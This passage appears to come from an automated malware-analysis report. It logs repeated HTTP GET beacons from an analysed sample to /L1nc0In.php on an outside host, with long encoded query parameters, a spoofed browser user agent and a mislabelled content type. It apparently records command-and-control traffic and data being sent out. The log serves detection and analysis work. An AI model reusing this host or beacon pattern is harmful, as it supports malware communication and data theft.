hGWZ5kVGVFSKNETp1kbjZHeyImaClmT1kkeOJzaE5UNJRkTndGSJBTSE1EeBNUZnFERPlXRqlkNJlmY2x2RkdHbtNmaOhlWFZ1RaZXMwIGbSdVYXZlRVhkSDxUaJBjUnVkaJZTSTVWe5clYsFDMixmUXF2VWZUVIp0QMlWVxMFUotmTQpUaPlWSzImeOhlWqlTbjFVOXp1as1mVWJUMSl2dplUMJl2TpVVbjFjUzkFbShVYv5UbjJUOXp1as1mVWJUMSl2dplURWVkUH5ERTRDMrlkNJNlW0ZUbUZlQxIVa3lWSxkERNRTQE9kQspXTGpUaPlWUXNVe5IzY6ZlMZZnSIVlVCFTUpdXaJhXVGVFRKl2TpF1VTxmTXFmMWdkUWJUMRl2dD1kNJlmY2xmMjBnWYp1UWZUVEp0QMl2bINlTCNUT3FkaNl2bql0aWdlW35UMhpWOHJGRS5mYspkbjFjTVZVUOtWSzl0URZHNrlkNJNkWsZ1RjRFdykld4JTUzZUbilnVHRGNWVlVR50aJNXSpFFc0VUS3FFROhXWqlkNJNlW2wmMVxGaykFaOBTTNZlRVRkSDxUaJVVYMJ0QPBTQq1UavpWSsBHWhRlVHFmaGJTU5dXVWFlTrl0cJN1Tp9maJxmSYRGMOdlWww2RhpmSYFlVCFTUpd3UNZTS5NWe5IzY6ZlMZZnSIV1cGJTWwRmMi1kVGVFRKNETw8maJpnVtNmdOVlVR50aJNXSD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXNVavpWS1lzVhBjQYFWeOJzYsJVVWFlTrl0cJlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIhFWN4YzY5IjZyIWZ5gTZycjY3EDOyYzYwAzN0YmM5MmZwcTZhNWY3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=d1nIiojIyQGM3ImNjJGOiNDOjJTZ4kjNmZWZ4U2M5ETOiZDOkBjIsISZkdDZjNjN1kDO4YzNzMmNzUGNidDOmRWO4ATM1EjYyEDN3U2YkFzNiojIjZTNiBzNjNWMkBDO0Y2N1YjNwIWZxcDN0UjM2MDM4UjIsIiN3Q2YkRjYxkDZilDNilzN0EmNlZzNkJGO5MjYjZWZ0ATYlZWMwYmNiojI5YDN4EDNxAzMiBjMlZTO0UzYwMWYlhDNjVWZwMGMjhjI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&1ee1ab9261adb8cfddd516f369c274e1=QX9JSUNJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjhzN1kDN5EDOkVTNiVzNwUWN4IWZmBTM1cTO3kjZwEjMzUjZkhjYjJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
